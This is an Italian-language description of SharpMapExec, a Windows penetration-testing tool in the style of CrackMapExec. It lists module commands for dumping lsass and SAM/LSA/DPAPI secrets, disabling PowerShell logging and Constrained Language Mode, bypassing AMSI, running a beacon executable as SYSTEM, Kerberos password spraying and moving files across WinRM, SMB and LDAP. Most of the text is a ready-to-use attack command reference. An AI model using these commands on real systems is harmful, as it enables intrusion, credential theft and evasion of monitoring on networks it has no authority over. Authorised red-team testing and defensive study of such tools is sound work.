
Coltellino svizzero nativo Windows per penetration testing, movimento laterale, accesso alle credenziali, esfiltrazione di dati e scansione delle vulnerabilità attraverso i protocolli CIM, SMB, WinRM, LDAP e Domain con autenticazione Kerberos/NTLM.
Una versione affilata di CrackMapExec. Questo strumento è pensato per semplificare i test di penetrazione delle reti e per creare un coltellino svizzero progettato per l'esecuzione su Windows, che è spesso un requisito durante le simulazioni di minacce interne.
Oltre alla scansione per l'accesso, può essere utilizzato per identificare configurazioni vulnerabili ed esfiltrare dati. L'idea alla base dei moduli di esfiltrazione dati è di eseguire la minor quantità di codice necessario sul computer remoto. Per ottenere ciò, lo strumento scarica tutti i segreti nella directory di raccolta e li analizza localmente.
Puoi specificare se desideri utilizzare l'autenticazione Kerberos o NTLM. Se scegli Kerberos, lo strumento creerà un token sacrificale e utilizzerà Rubeus per importare/richiedere il ticket. Se viene specificato NTLM, lo strumento utilizzerà SharpKatz SetThreadToken o l'impersonificazione LogonUser.
SharpMapExec.exe
usage:
--- Cim ---
Need plaintext password or the /impersonate flag
SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET
Available Cim modules
/m:enable_winrm (Runs Enable-PSRemoting -Force)
/m:disable_winrm (Runs Disable-PSRemoting -Force)
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:disable_pslogging (Modify registry to disable PowerShell Logging)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Reg32 ---
SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Reg32 modules
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Smb modules
/m:shares (Scan for accessible Smb shares)
--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump & parse lsass)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
/m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
/m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
/m:download /path:C:\file /destination:file (Download file from host)
/m:upload /path:C:\file /destination:file (Upload file to host)
--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg
--- Ldap ---
SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
Ldap modules
/m:spraydata (Download user and password policy)
Può essere utilizzato per scansionare l'accesso amministrativo, le condivisioni Smb accessibili, la versione Smb e la firma del relaying.
/m:shares (Scan enumerated shares for access)
La bestia. Ha un bypass Amsi integrato, un breakout del linguaggio JEA, analisi delle funzioni JEA. Può essere utilizzato per esecuzione di codice, scansione dell'accesso PsRemote, endpoint JEA vulnerabili ed esfiltrazione di dati.
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)
Attualmente supporta lo spraying di password di dominio e la creazione di un TGT per l'utente corrente che può essere utilizzato con il parametro /ticket per ottenere il contesto corrente.
Scarica i dati necessari prima dello spraying delle password
/m:spraydata (Download user and password policy)
Per l'esecuzione semplice o di massa in memoria di assembly C#

Spraying di password Kerberos e successiva scansione per l'accesso amministrativo locale

Questo progetto supporta la scansione degli endpoint JEA e analizza il codice sorgente dei comandi non predefiniti e verifica se l'endpoint non è stato configurato per la modalità no-language.

Scopri il riutilizzo della password amministratore locale con un hash NT.

Dump di massa del processo Lsass con DLL firmata Microsoft integrata e lo salva nella cartella loot

Esegue in tutti i processi di delega ordinati per utenti unici

Scansiona per la firma SMB e SMBv1

E molto altro!
Alcuni scenari con Kerberos richiederanno di sincronizzare l'orologio con il DC e impostare il DNS
net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')
Progetti che hanno aiutato o sono presenti in questo strumento